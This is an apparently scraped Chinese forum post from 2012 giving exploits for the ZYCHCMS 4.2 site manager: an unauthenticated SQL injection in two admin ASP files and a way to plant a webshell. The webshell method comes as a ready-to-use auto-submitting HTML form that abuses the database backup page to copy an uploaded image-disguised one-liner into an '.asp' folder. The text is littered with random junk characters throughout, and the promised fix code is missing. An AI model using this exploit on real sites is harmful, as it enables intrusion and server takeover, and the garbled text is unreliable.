! P7 i# P w1 N
9 M6 d4 t- E2 P3 q& a4 P8 w' v) q+ F) ?& {* C! d: q$ u3 t
8 Y; ~, X7 O& [2 C1 t0 Z* {
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)4 C4 @, h- V$ L8 C) Y
①SQL注射漏洞( {6 D6 q0 Z% D
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp/ I# ?, p1 ?; R( F I9 t7 C. J
漏洞原因:未过滤1 `& Y: ^. b; Y1 f1 i5 v9 L
漏洞代码:
. ^" F9 b# H4 k! U2 O: e 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。1 ~% S4 V6 f, {% i: k
修复方法:在文件开头加入代码
& J$ ?) |# a" z , L& z1 {( b0 u+ d4 n
: y/ `, z" F' }6 s! u g5 w6 T
②后台拿WBSHELL
2 v) o- J7 `+ a3 S& U 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
2 F* j: i) u0 z# k+ Y 这里在网上找了一个,改了下,将就着用。
5 l% F8 r, y G 以下是代码本地提交代码
! K4 b1 K& K+ J( I J: w. c, r * B/ _1 z) f e) c( o+ F; U
" @! l2 _! p" s6 l8 x q
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>+ q" x& f- `% W; C
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
8 y! ?0 O) P r5 G1 G" l <tr>$ l& Y* F: A" ?3 f; l
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>- Y1 G8 y% Q* [4 r$ J
</tr>/ B, Q) \7 a# N$ Y5 Z$ ^' S
<tr>
+ E. _# u0 X0 D <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
5 `3 w/ [8 }+ m </span>6 e! v7 q! r6 x8 M+ M y
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
- Y! Q3 B! A' I" g+ i$ Q! W <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >7 X2 P/ j4 A, g3 }! b+ }
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>3 [# ?) X" A+ v+ P/ j
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
9 Y2 i3 b2 N" S3 Q* Z) V6 t3 k <div align=”left”>
$ n$ i6 v3 D6 w( F, l <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
3 D+ a/ C& ^9 h( I( N <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>: o7 E9 Y* f: M* p
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />; U8 u6 K7 p* B5 s
</div></td>; A* b% F, n# _3 c3 i& D
</tr>2 Q6 n/ j2 _% O; U, F( k- u l
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>, C8 s# `+ i8 |# f( L3 T
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
; ^ I2 T: v: m" V$ N! v% h9 v <td class=”td”><div align=”left”>
5 w8 A1 S! j& x6 A: e, R <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
# W# J/ O/ z/ M7 r# k3 [: d [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
" h- T8 V# {0 n# _- b) J' V </tr>
4 y# p: W" Q) @0 B- ^8 L' Y& B <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
5 v' J9 j9 e9 A0 a9 W# { <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>3 P0 ]% h3 j5 }/ G
<td class=”td”><div align=”left”>
' G# W, v u' {6 c p <input type=”submit” value=”确定备份” class=”btn”
+ {& h% O" H A b </div></td>: H+ g1 q ]2 Q' \* H
</tr>6 O* b7 \" ]/ j' d
</table></td></tr></form>
9 [' v2 w6 Q( O: | </table>% E0 e6 B! J+ F/ t
</td>
8 Y( [: y+ |1 \) q5 P </tr>+ X- L M4 J9 u) j7 P( T) u
</table>5 M6 G! s4 `" h+ W3 J& ?3 B1 S" ~
<script>: \& @, T" `( `% Y! X
document.all.add.submit();% I* _; V/ D$ z
</script>
- Q4 Y% c% o6 o
/ n5 b. q( K$ r7 u* N5 m. }0 [0 X0 X0 h! L1 _7 V7 l
: ~# g+ S6 l1 x
|) }" W+ y/ X& c& S1 h* o! {% u
- k# _# v, Y a s% c7 h* }
7 M2 j( I# _) t4 r( b
( e9 o1 r1 I; P8 \
; h* k& u5 C5 W! n& s& D5 ^3 D% y7 `# c( m; f) W
2 b7 ` W3 G& g& A0 w+ S* k
|
发表于 2012-9-10 21:09:51
收藏
支持
反对